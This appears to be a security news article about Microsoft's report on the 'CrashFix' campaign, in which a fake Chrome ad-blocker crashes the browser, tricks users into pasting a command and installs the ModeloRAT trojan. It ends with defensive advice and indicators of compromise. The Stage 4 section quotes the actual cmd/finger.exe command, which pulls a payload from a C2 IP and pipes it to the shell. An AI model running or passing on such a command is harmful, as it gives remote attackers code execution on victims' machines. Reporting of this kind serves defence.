Microsoft Warns of Sophisticated New Malware Campaign Targeting Enterprise Users

Microsoft Warns of Sophisticated New Malware Campaign Targeting Enterprise Users.

February 9, 2026 — In a stark reminder of the rapidly evolving cybersecurity threat landscape, Microsoft has identified a dangerous new variant of social engineering attacks that deliberately crashes users’ browsers before tricking them into installing malware.

Dubbed “CrashFix,” this sophisticated campaign represents a significant escalation in tactics that exploit human psychology rather than technical vulnerabilities.

The Growing Threat of ClickFix and Its Variants

CrashFix is the latest evolution in a family of social engineering techniques collectively known as ClickFix, which has seen explosive growth over the past year. According to Microsoft’s analysis, ClickFix attacks have surged by 517% between 2024 and 2025, with the technique now accounting for 47% of all observed initial access attacks. This dramatic increase reflects a fundamental shift in how cybercriminals are approaching system compromise—moving away from traditional exploit-based attacks toward manipulating users into compromising their own systems.

“Defending against the ClickFix technique is uniquely challenging because the attack chain is built almost entirely on legitimate user actions and the abuse of trusted system tools,” explained Martin Zugec, technical solutions director at Bitdefender. “Unlike traditional malware, ClickFix turns the user into the initial access vector, making the attack look benign from an endpoint defense perspective.”

Microsoft Warns of Sophisticated New Malware Campaign Targeting Enterprise Users

How CrashFix Works: A Multi-Stage Attack

Stage 1: The Deceptive Entry Point

The CrashFix campaign identified by Microsoft Defender Experts in January 2026 begins with what appears to be a legitimate security tool. In documented cases, victims searching for ad-blocking software were served malicious advertisements leading them to install a Chrome extension called “NexShield Advanced Web Protection.”

NexShield is a near-perfect clone of the legitimate uBlock Origin Lite extension, complete with forged headers falsely crediting the original developer, Raymond Hill. The malicious extension was distributed through the official Chrome Web Store, lending it an air of legitimacy that would cause most users to trust it implicitly.

Stage 2: Deliberate Browser Crash

Once installed, NexShield’s true purpose becomes clear. The extension contains code that performs a denial-of-service attack against the user’s own browser by rapidly opening numerous Chrome runtime ports in a tight loop. This exhausts CPU and memory resources until the browser becomes unresponsive or crashes entirely.

This intentional crash is what distinguishes CrashFix from earlier ClickFix variants. Rather than simply presenting a fake error message, CrashFix creates a real problem that the user experiences firsthand, making the subsequent “solution” far more convincing.

Stage 3: The Fake Fix

When frustrated users force-quit and restart their browser, the extension springs its trap. A 400×600 pixel pop-up window appears displaying a professional-looking “CrashFix” security warning, claiming the browser crashed unexpectedly and urgently needs a scan to prevent future issues.

The pop-up implements multiple anti-analysis techniques to prevent users from discovering its true nature:

Blocking keyboard shortcuts for developer tools
Disabling right-click context menus
Preventing text selection
Creating a sense of urgency through warning messages

Stage 4: Malicious Command Execution

If users follow the instructions to “run a scan,” they’re told to open the Windows Run dialog (Win+R) and press Ctrl+V to paste what they believe is a repair command. Unbeknownst to them, the extension has already copied a malicious PowerShell command to their clipboard.

The command executes a sophisticated multi-stage payload:

cmd /c start "" /min cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe confirm@199.217.98[.]108|cmd."

This command leverages a legitimate Windows utility called finger.exe—originally designed to retrieve user information from remote systems—as a “living-off-the-land” binary to avoid detection. The utility is copied to a temporary directory and renamed to ct.exe before being used to download and execute the final payload.

ModeloRAT: The Ultimate Payload

For systems that are domain-joined (indicating corporate or enterprise environments), CrashFix deploys a sophisticated Python-based remote access trojan called ModeloRAT. This malware is specifically designed to target high-value business networks rather than home users.

ModeloRAT’s capabilities include:

System Reconnaissance: Scanning for over 50 different security and analysis tools, including Wireshark, Process Hacker, WinDbg, and x64dbg. If it detects these tools, it may alter its behavior or send fake responses to waste researchers’ time.

Persistence Mechanisms: Creating Windows Registry entries to ensure automatic execution at system startup. The malware disguises itself using names that mimic legitimate applications like “Spotify47” or “Adobe2841.”

Advanced Communication: Using RC4 encryption for command-and-control (C2) communications with periodic beacon requests to remote servers.

Anti-Analysis Techniques:

Fingerprinting to detect virtual machines and sandboxes
Checking for common researcher usernames like “John Doe”
Using typosquatting domains that closely resemble legitimate Google domains to hide malicious traffic
Multi-layered payload obfuscation and delayed execution

Targeted Data Collection: Gathering domain, user, and network information to assess the value of compromised systems. If the system is part of an enterprise network with access to Active Directory and sensitive resources, additional backdoors are deployed.

The Broader ClickFix Threat Landscape

CrashFix is part of a larger family of social engineering attacks that have been rapidly evolving:

FileFix

Discovered by security researcher mr.d0x, FileFix represents another variation that tricks users into pasting malicious commands into the Windows File Explorer address bar rather than the Run dialog. This approach appears even more benign to users, as interacting with File Explorer is a common, everyday action that rarely raises suspicion.

JackFix

Another variant that uses different psychological triggers to manipulate users into executing commands.

GlitchFix

Associated with the ErrTraffic traffic distribution system (TDS), GlitchFix causes compromised websites to appear glitchy before suggesting a “fix” to address the fabricated problem.

ClickFix Builders

The popularity of these techniques has spawned a malware-as-a-service ecosystem, with ClickFix builders advertised on hacker forums for $200 to $1,500 per month. These kits allow even less sophisticated attackers to deploy convincing social engineering campaigns.

The KongTuke Connection

The CrashFix campaign has been attributed to a threat actor known as KongTuke (also tracked as 404 TDS, Chaya_002, LandUpdate808, and TAG-124). This group operates a sophisticated traffic distribution system that profiles victim hosts before redirecting them to payload delivery sites.

KongTuke’s infrastructure has been leveraged by multiple cybercriminal organizations, including:

Rhysida ransomware group
Interlock ransomware operators
TA866 (Asylum Ambuscade)

The group has also been associated with deploying SocGholish and D3F@ck Loader malware in previous campaigns, demonstrating a pattern of collaboration with various ransomware and malware operators.

Platform Expansion: Beyond Windows

While CrashFix primarily targets Windows systems, Microsoft has observed the broader ClickFix technique expanding to other platforms. Since late 2025, macOS environments have been increasingly targeted through:

Deceptive Download Pages: Fake applications distributed through malicious Google Ads

Terminal Command Injection: Users tricked into copying and pasting commands into macOS Terminal

Specific macOS Stealers: Deployment of DigitStealer, MacSync, and Atomic macOS Stealer (AMOS)

Native Utility Abuse: Leveraging AppleScript automation and macOS utilities for fileless execution

These cross-platform campaigns harvest credentials, session data, browser passwords, cryptocurrency wallets, cloud credentials, and developer access keys.

Recent Related Threats

APT28 Exploits Microsoft Office Zero-Day

In a separate but equally concerning development, the Russian state-sponsored threat actor APT28 was observed exploiting a newly disclosed Microsoft Office vulnerability (CVE-2026-21509) just three days after its public disclosure. The campaign, dubbed Operation Neusploit, targeted users in Ukraine, Slovakia, and Romania.

The vulnerability allows attackers to send specially crafted Office files that establish WebDAV connections to external resources, leading to the deployment of the COVENANT framework’s Grunt implant. This rapid weaponization demonstrates how quickly sophisticated threat actors can adapt to newly disclosed vulnerabilities.

WhatsApp Platform Abuse

During November 2025, Microsoft identified a campaign leveraging WhatsApp for multi-stage infection and worm-like propagation to distribute the Eternidade Stealer. The attack begins with obfuscated Visual Basic scripts that drop malicious batch files, eventually launching PowerShell instances to download additional payloads.

This represents a growing trend of “platform abuse,” where adversaries exploit the legitimacy and user trust associated with widely used applications and services to distribute malware.

Defense Strategies and Mitigation

Microsoft and cybersecurity experts recommend a multi-layered approach to defending against CrashFix and similar social engineering attacks:

Technical Controls

Enable Cloud-Based Protection: Activate Microsoft Defender’s cloud protection and EDR block mode for real-time threat detection and response.
Restrict Legacy Utilities: Limit or monitor the use of legacy Windows utilities like finger.exe that can be abused by attackers. Consider blocking data transmission through these tools using Group Policy.
Attack Surface Reduction Rules: Implement rules that block executable files from running unless they meet prevalence, age, or trusted list criteria.
SmartScreen Protection: Ensure Microsoft SmartScreen is enabled in browsers to identify and block malicious websites, phishing sites, and malware hosts.
Browser Extension Controls: Implement policies that restrict which browser extensions can be installed, and regularly audit installed extensions for suspicious behavior.
Command Execution Restrictions: For users who don’t require PowerShell or command-line access in their daily work, consider restricting access to the Run dialog, PowerShell, and Command Prompt through Group Policy.

Authentication and Access

Multi-Factor Authentication (MFA): Enforce MFA on all accounts without exceptions. Require MFA from all devices, in all locations, at all times.
Least Privilege Access: Remove unnecessary administrative rights and implement role-based access controls to limit the damage from compromised accounts.
Credential Management: Implement policies preventing employees from storing enterprise credentials in browsers or password vaults secured with personal credentials. Organizations can disable password syncing in browsers on managed devices using Group Policy.

User Education and Awareness

Targeted Training: Conduct specific training sessions that replicate CrashFix and FileFix scenarios to build user resilience and recognition.
Warning Signs Education: Teach users to recognize red flags:
- Unexpected prompts to copy and paste commands
- Instructions to open Run dialog or PowerShell
- Browser crashes followed immediately by “fix” instructions
- Requests to install extensions from unfamiliar sources
Reporting Mechanisms: Establish clear procedures for users to report suspicious activities to security teams without fear of repercussion.
Regular Phishing Simulations: Conduct ongoing phishing exercises that specifically test resistance to social engineering tactics like ClickFix.

Monitoring and Response

Behavioral Analytics: Deploy endpoint detection solutions that monitor for suspicious behaviors such as unusual clipboard manipulation or PowerShell command execution initiated by user interactions.
Network Monitoring: Implement comprehensive logging and monitoring across endpoints, browsers, and networks to enable rapid detection and containment of attempted intrusions.
Threat Hunting: Conduct proactive threat hunting exercises looking for indicators of ClickFix variants, such as:
- Unusual browser extension installations
- Execution of renamed Windows utilities
- Suspicious PowerShell command patterns
- Connections to known malicious domains

The Future of Social Engineering Attacks

The emergence of CrashFix and its variants represents a concerning evolution in cybersecurity threats. By creating real technical problems that users experience firsthand before offering malicious “solutions,” attackers have found a way to significantly increase the credibility and success rate of their social engineering campaigns.

The shift from exploiting technical vulnerabilities to exploiting human behavior and trust makes these attacks particularly challenging to defend against with traditional security tools. As one Microsoft researcher noted, “Threat actors are increasingly abusing trusted user actions and native operating system utilities to bypass traditional defenses, making behavior-based detection and user awareness critical.”

Organizations must adapt their security strategies accordingly, placing greater emphasis on user education, behavioral monitoring, and the principle of least privilege. The days when security could rely primarily on perimeter defenses and signature-based detection are definitively over.

Conclusion

The CrashFix campaign serves as a wake-up call for organizations worldwide. With a 517% increase in ClickFix-style attacks and new variants emerging regularly, the threat landscape is evolving faster than many security teams can adapt. The combination of sophisticated social engineering, abuse of legitimate system tools, and targeted deployment against high-value corporate networks makes these attacks particularly dangerous.

Success in defending against these threats requires a fundamental shift in how organizations approach security—moving beyond technical controls to build a security culture where users are genuinely equipped to recognize and resist manipulation attempts. Combined with robust technical defenses, comprehensive monitoring, and rapid incident response capabilities, organizations can build resilience against this new generation of social engineering attacks.

The message is clear: in the modern threat landscape, your users are both your greatest vulnerability and your most important line of defense. Investing in their awareness and education is no longer optional—it’s essential for survival.

Key Indicators of Compromise (IOCs)

Organizations should monitor for the following indicators:

Malicious Extension:

Extension ID: cpcdkmjddocikjdkbbeiaafnpdbdafmi
Developer Email: alaynna6899@gmail.com
Name: NexShield Advanced Web Protection

File Hashes:

ct.exe (renamed finger.exe): SHA-256: beb0229043741a7c7bfbb4f39d00f583e37ea378d11ed3302d0a2bc30f267006

Malicious Domains:

199.217.98[.]108 (C2 infrastructure)
Various typosquatting domains mimicking Google services

Behavioral Indicators:

Rapid creation of Chrome runtime ports
Unexpected browser crashes followed by security warnings
Execution of finger.exe from unusual locations
PowerShell execution originating from browser processes
Suspicious clipboard activity

For the latest threat intelligence and security updates, organizations should subscribe to Microsoft Security Blog and regularly review security advisories from their endpoint protection vendors.